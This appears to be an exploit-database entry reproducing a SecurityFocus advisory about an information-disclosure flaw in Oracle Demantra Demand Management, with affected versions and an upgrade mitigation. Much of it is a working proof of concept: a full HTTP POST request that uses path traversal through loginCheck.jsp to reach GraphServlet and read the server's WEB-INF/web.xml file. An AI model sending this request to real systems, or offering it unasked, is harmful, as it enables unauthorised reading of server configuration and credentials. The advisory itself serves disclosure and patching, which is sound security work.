Oracle Supply Chain Products Suite Remote Vulnerability

vendor:

Oracle Supply Chain Products Suite

by:

SecurityFocus

8,8

CVSS

HIGH

Remote Vulnerability

200

CWE

Product Name: Oracle Supply Chain Products Suite

Affected Version From: 12.2.0

Affected Version To: 12.2.2

Patch Exists: YES

Related CWE: N/A

CPE: oracle:demantra_demand_management

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2013

Oracle Supply Chain Products Suite Remote Vulnerability

Oracle Supply Chain Products Suite is prone to a remote vulnerability in Oracle Demantra Demand Management. Attackers can exploit this issue to obtain sensitive information by sending a POST request to the GraphServlet with the filename parameter set to the path of the web.xml file.

Mitigation:

Upgrade to Oracle Supply Chain Products Suite version 12.2.3 or later.

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/64836/info

Oracle Supply Chain Products Suite is prone to a remote vulnerability in Oracle Demantra Demand Management.

The vulnerability can be exploited over the 'HTTP' protocol. The 'DM Others' sub component is affected.

Attackers can exploit this issue to obtain sensitive information.

This vulnerability affects the following supported versions:
12.2.0, 12.2.1, 12.2.2

POST /demantra/common/loginCheck.jsp/../../GraphServlet HTTP/1.1
Host: target.com:8080
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:22.0) Gecko/20100101 Firefox/22.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 46

filename=C:/Program Files (x86)/Oracle Demantra Spectrum/Collaborator/demantra/WEB-INF/web.xml